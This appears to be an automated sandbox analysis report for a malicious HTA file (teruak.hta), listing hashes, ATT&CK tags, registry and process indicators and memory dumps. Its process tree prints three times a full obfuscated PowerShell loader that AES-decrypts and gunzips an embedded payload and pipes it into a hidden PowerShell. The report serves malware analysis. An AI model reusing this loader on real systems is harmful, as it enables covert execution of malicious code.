5d9fd9c38080619f472c99bc4c3793ba7103fb0b39a91fb8beb52426eead11cc

General

Target

teruak.hta
Size

1.3MB
MD5

79f3f52bd1349516cc18af5e156ecfa4
SHA1

b329f3559ad62cc1dcca2acf44c07f60e5be4d7d
SHA256

5d9fd9c38080619f472c99bc4c3793ba7103fb0b39a91fb8beb52426eead11cc
SHA512

d7d8532516177580ad42fbb9a08b6670b27c4127120a61dcfd19014d04bc45a8d791584583ae274d61929053f4b40a177450f4255ee30c284091e752d0db6538
SSDEEP

3072:+I+ID8yMm3e7hlH8tedS2BQU0Rm22nKjudBqmxpqhKGCs4Zu1o5w7:5N8B36eYpBRZUnd+3wu1oi7

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1132	powershell.exe
1132	powershell.exe
2760	powershell.exe
2844	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1132	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2444 wrote to memory of 1132	2444	mshta.exe	29
PID 2444 wrote to memory of 1132	2444	mshta.exe	29
PID 2444 wrote to memory of 1132	2444	mshta.exe	29
PID 2444 wrote to memory of 1132	2444	mshta.exe	29
PID 1132 wrote to memory of 2504	1132	powershell.exe	33
PID 1132 wrote to memory of 2504	1132	powershell.exe	33
PID 1132 wrote to memory of 2504	1132	powershell.exe	33
PID 1132 wrote to memory of 2504	1132	powershell.exe	33
PID 2504 wrote to memory of 2760	2504	cmd.exe	31
PID 2504 wrote to memory of 2760	2504	cmd.exe	31
PID 2504 wrote to memory of 2760	2504	cmd.exe	31
PID 2504 wrote to memory of 2760	2504	cmd.exe	31
PID 2504 wrote to memory of 2844	2504	cmd.exe	30
PID 2504 wrote to memory of 2844	2504	cmd.exe	30
PID 2504 wrote to memory of 2844	2504	cmd.exe	30
PID 2504 wrote to memory of 2844	2504	cmd.exe	30

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\teruak.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $pdoI = 'AAAAAAAAAAAAAAAAAAAAALylLi+q79nUkK1J0wFg4xTdueXPEhSZsg4t2iNVkWtAqzmstibIexB38yK5nJV5x0WqlNuMECR4mPT6IHNlFK0Yb+2mSvOpcQTO1E6+yqRgX53wBu95uo/qaHcSjNZgcfthC8oju4WtQWcuSuy45EXmd/cpO3ue8gUmEpxifXeLztRXxlXujkwYu8NTl/V+Y33FTCw4i9dBVw87jlfboEjKCbNRBWY260HXjjE1t0LJbdwzPFeBR51b4ka3t6bbAf2ZjR6vHWZdCE1jXC36S708883kg7n45D5yTo5T/RLs2XZ1WXLmDECJz0+aqwTSUn+R4gicJAPJIfo2HgbvQD5NUBZdC1BHxQKtq+Pc3CI1WI9dj45f7EBCCr+/p0rZppgqHj5DWU2GoBl09Kn1/lad+DbsBPaVDG481Di0RwzB8dm//II0lFUvRiE7gendQc9JROa6BtyN9sBvtIiBA5MXadrqg+Wt0WDiObB3OJRoZK4Djo6bZocqWHOYWO/CGhpCpYUfAn4Dxlteh404yNyo0dv4DyRG+rTBHf0gCUSmPXR4Qfe/SgrJBX1u8mo77F7OeOPcIrU0kahmAVmZgrTjpUxxEhxuYW0gUfLSbjMWAOYsKmFl/ICy5KeEwZeaaw9LOKxjYJWC/v0aKfkbsz/sdHUgKpvxZn5ktzh/GzYgNlnINazSVTmfqNCaBE0o2AwghNQEStjb0wPMmNyqCgs+oxs+SoAO/RIXQ9bQdxHMwAwgRRVu/G764gSp8324nXCPLGN9+PA/EVSemIaZIo6ONglKaUShHENHD3WhTntb4CaP7QlnkzUgRzlby5w1kFW7xj7l7VwLOKuoCLEawCYW5s0nFcN0euOI1zRT9Pz/kh/tMVjA+3r9zTsb0Hp2lDnEEoMXyqUcmQCyH3wBGuuq4pYffzRtmeyx3gC4xbAi0ZZsIXfFYpJ7gM6AIko5l3tIPL73yYSYBqvSxKANpTdm2PVgf0g67Twyo7WlSxr0IMTN0XpKte+7UYIe5/QZKxrjGSXDrktaY3YBi48gpGCXt3Qr9CrpgBhHLxIpY3L5S6yInW9NgFKotWoF7FxY7F9bZue5WeCksUyQYPp3ClEFjDblsRJ2afsubnaTbC0N';$dRPlME = 'R2N4dllsU2xaWnZaUm56WE9VbEhoWFJDZEljT1RJRWE=';$aEhghlH = New-Object 'System.Security.Cryptography.AesManaged';$aEhghlH.Mode = [System.Security.Cryptography.CipherMode]::ECB;$aEhghlH.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$aEhghlH.BlockSize = 128;$aEhghlH.KeySize = 256;$aEhghlH.Key = [System.Convert]::FromBase64String($dRPlME);$UIcYY = [System.Convert]::FromBase64String($pdoI);$mTHTYwds = $UIcYY[0..15];$aEhghlH.IV = $mTHTYwds;$RuoCtWYZF = $aEhghlH.CreateDecryptor();$GKknPJoLS = $RuoCtWYZF.TransformFinalBlock($UIcYY, 16, $UIcYY.Length - 16);$aEhghlH.Dispose();$IQFRhKP = New-Object System.IO.MemoryStream( , $GKknPJoLS );$LWbjTi = New-Object System.IO.MemoryStream;$QzULrzLMV = New-Object System.IO.Compression.GzipStream $IQFRhKP, ([IO.Compression.CompressionMode]::Decompress);$QzULrzLMV.CopyTo( $LWbjTi );$QzULrzLMV.Close();$IQFRhKP.Close();[byte[]] $CfcaW = $LWbjTi.ToArray();$AUXJS = [System.Text.Encoding]::UTF8.GetString($CfcaW);$AUXJS | powershell - }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c powershell.exe $pdoI = 'AAAAAAAAAAAAAAAAAAAAALylLi+q79nUkK1J0wFg4xTdueXPEhSZsg4t2iNVkWtAqzmstibIexB38yK5nJV5x0WqlNuMECR4mPT6IHNlFK0Yb+2mSvOpcQTO1E6+yqRgX53wBu95uo/qaHcSjNZgcfthC8oju4WtQWcuSuy45EXmd/cpO3ue8gUmEpxifXeLztRXxlXujkwYu8NTl/V+Y33FTCw4i9dBVw87jlfboEjKCbNRBWY260HXjjE1t0LJbdwzPFeBR51b4ka3t6bbAf2ZjR6vHWZdCE1jXC36S708883kg7n45D5yTo5T/RLs2XZ1WXLmDECJz0+aqwTSUn+R4gicJAPJIfo2HgbvQD5NUBZdC1BHxQKtq+Pc3CI1WI9dj45f7EBCCr+/p0rZppgqHj5DWU2GoBl09Kn1/lad+DbsBPaVDG481Di0RwzB8dm//II0lFUvRiE7gendQc9JROa6BtyN9sBvtIiBA5MXadrqg+Wt0WDiObB3OJRoZK4Djo6bZocqWHOYWO/CGhpCpYUfAn4Dxlteh404yNyo0dv4DyRG+rTBHf0gCUSmPXR4Qfe/SgrJBX1u8mo77F7OeOPcIrU0kahmAVmZgrTjpUxxEhxuYW0gUfLSbjMWAOYsKmFl/ICy5KeEwZeaaw9LOKxjYJWC/v0aKfkbsz/sdHUgKpvxZn5ktzh/GzYgNlnINazSVTmfqNCaBE0o2AwghNQEStjb0wPMmNyqCgs+oxs+SoAO/RIXQ9bQdxHMwAwgRRVu/G764gSp8324nXCPLGN9+PA/EVSemIaZIo6ONglKaUShHENHD3WhTntb4CaP7QlnkzUgRzlby5w1kFW7xj7l7VwLOKuoCLEawCYW5s0nFcN0euOI1zRT9Pz/kh/tMVjA+3r9zTsb0Hp2lDnEEoMXyqUcmQCyH3wBGuuq4pYffzRtmeyx3gC4xbAi0ZZsIXfFYpJ7gM6AIko5l3tIPL73yYSYBqvSxKANpTdm2PVgf0g67Twyo7WlSxr0IMTN0XpKte+7UYIe5/QZKxrjGSXDrktaY3YBi48gpGCXt3Qr9CrpgBhHLxIpY3L5S6yInW9NgFKotWoF7FxY7F9bZue5WeCksUyQYPp3ClEFjDblsRJ2afsubnaTbC0N';$dRPlME = 'R2N4dllsU2xaWnZaUm56WE9VbEhoWFJDZEljT1RJRWE=';$aEhghlH = New-Object 'System.Security.Cryptography.AesManaged';$aEhghlH.Mode = [System.Security.Cryptography.CipherMode]::ECB;$aEhghlH.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$aEhghlH.BlockSize = 128;$aEhghlH.KeySize = 256;$aEhghlH.Key = [System.Convert]::FromBase64String($dRPlME);$UIcYY = [System.Convert]::FromBase64String($pdoI);$mTHTYwds = $UIcYY[0..15];$aEhghlH.IV = $mTHTYwds;$RuoCtWYZF = $aEhghlH.CreateDecryptor();$GKknPJoLS = $RuoCtWYZF.TransformFinalBlock($UIcYY, 16, $UIcYY.Length - 16);$aEhghlH.Dispose();$IQFRhKP = New-Object System.IO.MemoryStream( , $GKknPJoLS );$LWbjTi = New-Object System.IO.MemoryStream;$QzULrzLMV = New-Object System.IO.Compression.GzipStream $IQFRhKP, ([IO.Compression.CompressionMode]::Decompress);$QzULrzLMV.CopyTo( $LWbjTi );$QzULrzLMV.Close();$IQFRhKP.Close();[byte[]] $CfcaW = $LWbjTi.ToArray();$AUXJS = [System.Text.Encoding]::UTF8.GetString($CfcaW);$AUXJS | powershell -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $pdoI = 'AAAAAAAAAAAAAAAAAAAAALylLi+q79nUkK1J0wFg4xTdueXPEhSZsg4t2iNVkWtAqzmstibIexB38yK5nJV5x0WqlNuMECR4mPT6IHNlFK0Yb+2mSvOpcQTO1E6+yqRgX53wBu95uo/qaHcSjNZgcfthC8oju4WtQWcuSuy45EXmd/cpO3ue8gUmEpxifXeLztRXxlXujkwYu8NTl/V+Y33FTCw4i9dBVw87jlfboEjKCbNRBWY260HXjjE1t0LJbdwzPFeBR51b4ka3t6bbAf2ZjR6vHWZdCE1jXC36S708883kg7n45D5yTo5T/RLs2XZ1WXLmDECJz0+aqwTSUn+R4gicJAPJIfo2HgbvQD5NUBZdC1BHxQKtq+Pc3CI1WI9dj45f7EBCCr+/p0rZppgqHj5DWU2GoBl09Kn1/lad+DbsBPaVDG481Di0RwzB8dm//II0lFUvRiE7gendQc9JROa6BtyN9sBvtIiBA5MXadrqg+Wt0WDiObB3OJRoZK4Djo6bZocqWHOYWO/CGhpCpYUfAn4Dxlteh404yNyo0dv4DyRG+rTBHf0gCUSmPXR4Qfe/SgrJBX1u8mo77F7OeOPcIrU0kahmAVmZgrTjpUxxEhxuYW0gUfLSbjMWAOYsKmFl/ICy5KeEwZeaaw9LOKxjYJWC/v0aKfkbsz/sdHUgKpvxZn5ktzh/GzYgNlnINazSVTmfqNCaBE0o2AwghNQEStjb0wPMmNyqCgs+oxs+SoAO/RIXQ9bQdxHMwAwgRRVu/G764gSp8324nXCPLGN9+PA/EVSemIaZIo6ONglKaUShHENHD3WhTntb4CaP7QlnkzUgRzlby5w1kFW7xj7l7VwLOKuoCLEawCYW5s0nFcN0euOI1zRT9Pz/kh/tMVjA+3r9zTsb0Hp2lDnEEoMXyqUcmQCyH3wBGuuq4pYffzRtmeyx3gC4xbAi0ZZsIXfFYpJ7gM6AIko5l3tIPL73yYSYBqvSxKANpTdm2PVgf0g67Twyo7WlSxr0IMTN0XpKte+7UYIe5/QZKxrjGSXDrktaY3YBi48gpGCXt3Qr9CrpgBhHLxIpY3L5S6yInW9NgFKotWoF7FxY7F9bZue5WeCksUyQYPp3ClEFjDblsRJ2afsubnaTbC0N';$dRPlME = 'R2N4dllsU2xaWnZaUm56WE9VbEhoWFJDZEljT1RJRWE=';$aEhghlH = New-Object 'System.Security.Cryptography.AesManaged';$aEhghlH.Mode = [System.Security.Cryptography.CipherMode]::ECB;$aEhghlH.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$aEhghlH.BlockSize = 128;$aEhghlH.KeySize = 256;$aEhghlH.Key = [System.Convert]::FromBase64String($dRPlME);$UIcYY = [System.Convert]::FromBase64String($pdoI);$mTHTYwds = $UIcYY[0..15];$aEhghlH.IV = $mTHTYwds;$RuoCtWYZF = $aEhghlH.CreateDecryptor();$GKknPJoLS = $RuoCtWYZF.TransformFinalBlock($UIcYY, 16, $UIcYY.Length - 16);$aEhghlH.Dispose();$IQFRhKP = New-Object System.IO.MemoryStream( , $GKknPJoLS );$LWbjTi = New-Object System.IO.MemoryStream;$QzULrzLMV = New-Object System.IO.Compression.GzipStream $IQFRhKP, ([IO.Compression.CompressionMode]::Decompress);$QzULrzLMV.CopyTo( $LWbjTi );$QzULrzLMV.Close();$IQFRhKP.Close();[byte[]] $CfcaW = $LWbjTi.ToArray();$AUXJS = [System.Text.Encoding]::UTF8.GetString($CfcaW);$AUXJS
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
3e48855849901884e08f012daf76d863

SHA1
a944e0233b814a02912069a924208ad5b7ab6134

SHA256
ccadf1932247267789dfa9e473078c81d03508b783b38ddc6bdcb80f9482a967

SHA512
fb38af7408f7f123132e74b003054fc391c9fe81bff4630f75e9f41d5cc33c4248e37044d8dc0daa16100bcb57832a1c54bafa0db07f1acc10361cd6d6a1f9f4

Download Submit
memory/1132-3-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1132-4-0x0000000071C50000-0x00000000721FB000-memory.dmp

Filesize
5.7MB

Download
memory/1132-5-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1132-6-0x0000000071C50000-0x00000000721FB000-memory.dmp

Filesize
5.7MB

Download
memory/1132-2-0x0000000071C50000-0x00000000721FB000-memory.dmp

Filesize
5.7MB

Download
memory/2760-22-0x0000000073FD0000-0x000000007457B000-memory.dmp

Filesize
5.7MB

Download
memory/2760-27-0x0000000073FD0000-0x000000007457B000-memory.dmp

Filesize
5.7MB

Download
memory/2760-18-0x0000000073FD0000-0x000000007457B000-memory.dmp

Filesize
5.7MB

Download
memory/2760-26-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

Filesize
256KB

Download
memory/2760-21-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

Filesize
256KB

Download
memory/2760-24-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

Filesize
256KB

Download
memory/2844-20-0x0000000073FD0000-0x000000007457B000-memory.dmp

Filesize
5.7MB

Download
memory/2844-23-0x0000000002EE0000-0x0000000002F20000-memory.dmp

Filesize
256KB

Download
memory/2844-25-0x0000000002EE0000-0x0000000002F20000-memory.dmp

Filesize
256KB

Download
memory/2844-19-0x0000000002EE0000-0x0000000002F20000-memory.dmp

Filesize
256KB

Download
memory/2844-17-0x0000000073FD0000-0x000000007457B000-memory.dmp

Filesize
5.7MB

Download
memory/2844-28-0x0000000073FD0000-0x000000007457B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing